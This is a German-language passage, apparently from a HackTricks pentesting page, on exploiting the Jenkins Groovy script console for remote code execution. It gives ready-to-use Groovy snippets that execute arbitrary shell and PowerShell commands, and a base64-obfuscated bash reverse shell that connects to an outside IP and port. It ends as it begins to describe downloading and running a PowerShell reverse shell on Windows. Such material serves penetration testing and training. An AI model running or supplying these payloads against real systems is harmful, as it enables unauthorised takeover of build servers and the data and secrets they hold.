Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an dieHackTricks und HackTricks Cloud GitHub-Repositories senden.
Jenkins RCE mit Groovy-Skript
Dies ist weniger aufdringlich als das Erstellen eines neuen Projekts in Jenkins
Gehen Sie zu Pfad_jenkins/script
Geben Sie im Textfeld das Skript ein
def process ="PowerShell.exe <WHATEVER>".execute()println "Found text ${process.text}"
Du könntest einen Befehl ausführen mit: cmd.exe /c dir
In Linux kannst du folgendes tun: "ls /".execute().text
Wenn du Anführungszeichen und einfache Anführungszeichen im Text verwenden musst, kannst du """PAYLOAD""" (dreifache doppelte Anführungszeichen) verwenden, um das Payload auszuführen.
Ein weiteres nützliches Groovy-Skript ist (ersetze [INSERT COMMAND]):
def sout = new StringBuffer(), serr = new StringBuffer()def proc ='[INSERT COMMAND]'.execute()proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println "out> $sout err> $serr"
Umgekehrte Shell in Linux
def sout = new StringBuffer(), serr = new StringBuffer()def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println "out> $sout err> $serr"
Umgekehrte Shell in Windows
Sie können einen HTTP-Server mit einer PS-Umkehrshell vorbereiten und Jenkins verwenden, um sie herunterzuladen und auszuführen: